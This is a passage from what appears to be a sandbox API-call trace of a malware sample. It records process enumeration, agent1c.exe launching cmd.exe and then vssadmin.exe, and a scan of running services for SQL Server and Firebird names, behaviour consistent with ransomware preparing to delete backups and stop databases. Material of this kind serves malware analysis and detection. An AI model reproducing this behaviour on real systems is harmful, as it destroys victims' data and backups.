(in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0057.411] lstrlenW (lpString="entrepreneur.exe") returned 16 [0057.411] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0057.412] lstrlenW (lpString="andrew kinds.exe") returned 16 [0057.412] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0057.412] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0057.412] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0057.413] lstrlenW (lpString="educated.exe") returned 12 [0057.413] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0057.414] lstrlenW (lpString="servers.exe") returned 11 [0057.414] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0057.415] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0057.415] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0057.415] lstrlenW (lpString="gbp_chair.exe") returned 13 [0057.415] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0057.416] lstrlenW (lpString="attention infected.exe") returned 22 [0057.416] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0057.417] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0057.417] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0057.417] lstrlenW (lpString="pattern amateur.exe") returned 19 [0057.417] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0057.418] lstrlenW (lpString="referral.exe") returned 12 [0057.418] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0057.419] lstrlenW (lpString="copyingseems.exe") returned 16 [0057.419] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0057.419] lstrlenW (lpString="spin generally.exe") returned 18 [0057.419] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0057.420] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0057.420] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0057.421] lstrlenW (lpString="transmit.exe") returned 12 [0057.421] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0057.421] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0057.421] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0057.438] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0057.442] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0057.452] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0057.452] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0057.471] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0057.471] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0057.472] lstrlenW (lpString="delight.exe") returned 11 [0057.472] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0057.472] lstrlenW (lpString="within enquiry.exe") returned 18 [0057.472] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0057.473] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0057.473] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0057.474] lstrlenW (lpString="agent1c.exe") returned 11 [0057.474] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0057.474] lstrlenW (lpString="cmd.exe") returned 7 [0057.474] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.475] lstrlenW (lpString="conhost.exe") returned 11 [0057.475] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0057.476] lstrlenW (lpString="vssadmin.exe") returned 12 [0057.476] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0057.477] lstrlenW (lpString="VSSVC.exe") returned 9 [0057.477] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.477] lstrlenW (lpString="svchost.exe") returned 11 [0057.477] Process32NextW (in: hSnapshot=0x178, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0057.478] CloseHandle (hObject=0x178) returned 1 [0057.478] Sleep (dwMilliseconds=0x1f4) [0058.013] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720330 [0058.013] EnumServicesStatusExW (in: hSCManager=0x3720330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0058.014] GetLastError () returned 0xea [0058.014] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x6e39b0 [0058.014] EnumServicesStatusExW (in: hSCManager=0x3720330, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6e39b0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6e39b0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0058.014] CloseServiceHandle (hSCObject=0x3720330) returned 1 [0058.015] lstrlenW (lpString="Appinfo") returned 7 [0058.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0058.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0058.015] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0058.015] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0058.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0058.015] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0058.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0058.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0058.015] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0058.015] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0058.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0058.015] lstrlenW (lpString="AudioSrv") returned 8 [0058.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0058.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0058.015] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0058.015] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0058.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0058.015] lstrlenW (lpString="BFE") returned 3 [0058.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0058.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0058.015] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0058.015] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0058.015] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0058.015] lstrlenW (lpString="CryptSvc") returned 8 [0058.015] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0058.015] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0058.015] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0058.015] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0058.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0058.016] lstrlenW (lpString="CscService") returned 10 [0058.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0058.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0058.016] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0058.016] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0058.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0058.016] lstrlenW (lpString="DcomLaunch") returned 10 [0058.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0058.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0058.016] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0058.016] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0058.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0058.016] lstrlenW (lpString="Dhcp") returned 4 [0058.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0058.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0058.016] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0058.016] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0058.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0058.016] lstrlenW (lpString="Dnscache") returned 8 [0058.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0058.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0058.016] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0058.016] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0058.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0058.016] lstrlenW (lpString="DPS") returned 3 [0058.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0058.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0058.016] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0058.016] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0058.016] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0058.016] lstrlenW (lpString="eventlog") returned 8 [0058.016] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0058.016] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0058.017] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0058.017] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0058.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0058.017] lstrlenW (lpString="EventSystem") returned 11 [0058.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0058.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0058.017] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0058.017] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0058.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0058.017] lstrlenW (lpString="gpsvc") returned 5 [0058.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0058.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0058.017] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0058.017] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0058.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0058.017] lstrlenW (lpString="iphlpsvc") returned 8 [0058.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0058.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0058.017] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0058.017] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0058.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0058.017] lstrlenW (lpString="LanmanServer") returned 12 [0058.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0058.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0058.017] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0058.017] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0058.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0058.017] lstrlenW (lpString="LanmanWorkstation") returned 17 [0058.017] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0058.017] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0058.017] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0058.017] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0058.017] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0058.017] lstrlenW (lpString="lmhosts") returned 7 [0058.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0058.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0058.018] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0058.018] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0058.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0058.018] lstrlenW (lpString="MMCSS") returned 5 [0058.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0058.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0058.018] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0058.018] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0058.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0058.018] lstrlenW (lpString="MpsSvc") returned 6 [0058.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0058.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0058.018] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0058.018] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0058.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0058.018] lstrlenW (lpString="Netman") returned 6 [0058.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0058.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0058.018] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0058.018] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0058.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0058.018] lstrlenW (lpString="netprofm") returned 8 [0058.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0058.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0058.018] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0058.018] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0058.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0058.018] lstrlenW (lpString="NlaSvc") returned 6 [0058.018] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0058.018] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0058.018] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0058.018] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0058.018] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0058.019] lstrlenW (lpString="nsi") returned 3 [0058.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0058.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0058.019] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0058.019] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0058.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0058.019] lstrlenW (lpString="PcaSvc") returned 6 [0058.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0058.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0058.019] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0058.019] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0058.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0058.019] lstrlenW (lpString="PlugPlay") returned 8 [0058.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0058.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0058.019] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0058.019] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0058.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0058.019] lstrlenW (lpString="Power") returned 5 [0058.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0058.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0058.019] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0058.019] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0058.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0058.019] lstrlenW (lpString="ProfSvc") returned 7 [0058.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0058.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0058.019] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0058.019] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0058.019] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0058.019] lstrlenW (lpString="RpcEptMapper") returned 12 [0058.019] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0058.019] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0058.020] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0058.020] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0058.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0058.020] lstrlenW (lpString="RpcSs") returned 5 [0058.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0058.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0058.020] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0058.020] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0058.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0058.020] lstrlenW (lpString="SamSs") returned 5 [0058.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0058.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0058.020] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0058.020] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0058.020] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0058.020] lstrlenW (lpString="Schedule") returned 8 [0058.020] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0058.020] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0058.020] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0058.020] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0058.020] lstrcmpiW (lpString1="sqlserveradhelper", 